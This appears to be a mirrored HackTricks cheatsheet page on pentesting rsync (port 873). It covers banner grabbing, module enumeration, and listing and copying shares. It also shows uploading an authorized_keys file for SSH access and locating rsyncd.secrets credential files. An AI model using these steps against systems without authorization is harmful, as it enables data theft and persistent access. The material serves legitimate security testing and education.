daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

873-pentesting-rsync.md (4832B)


      1 ---
      2 title: "873 - Pentesting Rsync"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/873-pentesting-rsync.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/873-pentesting-rsync.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 873 - Pentesting Rsync
     14 
     15 ## **Basic Information**
     16 
     17 `rsync` synchronizes files locally, over a remote shell such as SSH, or through the rsync daemon protocol. Its delta-transfer algorithm can reduce network traffic, while options control compression, recursion, and which metadata is preserved.<sup>[[2]](#references)</sup>
     18 
     19 The earlier zlib and `stunnel` details remain operationally relevant. With `--compress`, current rsync versions can negotiate `zstd`, `lz4`, `zlibx`, or `zlib`; an older peer is normally assumed to support zlib. A direct rsync-daemon connection is not automatically encrypted: use the remote-shell form over SSH or a correctly authenticated TLS wrapper such as `rsync-ssl`/`stunnel` when confidentiality and server identity are required.<sup>[[2]](#references)[[4]](#references)</sup>
     20 
     21 **Default port:** 873
     22 
     23 ```text
     24 PORT    STATE SERVICE REASON
     25 873/tcp open  rsync   syn-ack
     26 ```
     27 
     28 ## Enumeration
     29 
     30 ### Banner & Manual communication
     31 
     32 ```bash
     33 nc -vn 127.0.0.1 873
     34 (UNKNOWN) [127.0.0.1] 873 (rsync) open
     35 @RSYNCD: 31.0        <--- You receive this banner with the version from the server
     36 @RSYNCD: 31.0        <--- Then you send the same info
     37 #list                <--- Then you ask the sever to list
     38 raidroot             <--- The server starts enumerating
     39 USBCopy
     40 NAS_Public
     41 _NAS_Recycle_TOSRAID	<--- Enumeration finished
     42 @RSYNCD: EXIT         <--- Sever closes the connection
     43 
     44 
     45 #Now lets try to enumerate "raidroot"
     46 nc -vn 127.0.0.1 873
     47 (UNKNOWN) [127.0.0.1] 873 (rsync) open
     48 @RSYNCD: 31.0
     49 @RSYNCD: 31.0
     50 raidroot
     51 @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
     52 ```
     53 
     54 ### **Enumerating Shared Folders**
     55 
     56 **Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used:<sup>[[1]](#references)</sup>
     57 
     58 ```bash
     59 nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
     60 msf> use auxiliary/scanner/rsync/modules_list
     61 
     62 # Example with IPv6 and alternate port
     63 rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
     64 ```
     65 
     66 Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message.
     67 
     68 ### [**Brute Force**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#rsync)
     69 
     70 ### Manual Rsync Usage
     71 
     72 Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through:
     73 
     74 ```bash
     75 # Listing a shared folder
     76 rsync -av --list-only rsync://192.168.0.123/shared_name
     77 
     78 # Copying files from a shared folder
     79 rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
     80 ```
     81 
     82 With `-a`, this process recursively transfers files and requests archive-mode metadata preservation. Actual ownership, ACL, xattr, device, and permission behavior depends on additional options and privileges.<sup>[[1]](#references)[[2]](#references)</sup>
     83 
     84 With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear:
     85 
     86 ```bash
     87 rsync -av --list-only rsync://username@192.168.0.123/shared_name
     88 rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
     89 ```
     90 
     91 To **upload content**, such as an _**authorized_keys**_ file for access, use:
     92 
     93 ```bash
     94 rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
     95 ```
     96 
     97 ## POST
     98 
     99 To locate the rsyncd configuration file, execute:
    100 
    101 ```bash
    102 find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
    103 ```
    104 
    105 Within this file, a `secrets file` parameter might point to a file containing **usernames and passwords** for rsyncd authentication. Module options also control listing, read/write access, path confinement, and allowed hosts.<sup>[[3]](#references)</sup>
    106 
    107 ## References
    108 
    109 - [1] [Pentesting Rsync - SmeegeSec](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
    110 - [2] [rsync project — `rsync(1)` manual](https://download.samba.org/pub/rsync/rsync.1)
    111 - [3] [rsync project — `rsyncd.conf(5)` manual](https://download.samba.org/pub/rsync/rsyncd.conf.5)
    112 - [4] [rsync project — `rsync-ssl(1)` manual](https://download.samba.org/pub/rsync/rsync-ssl.1)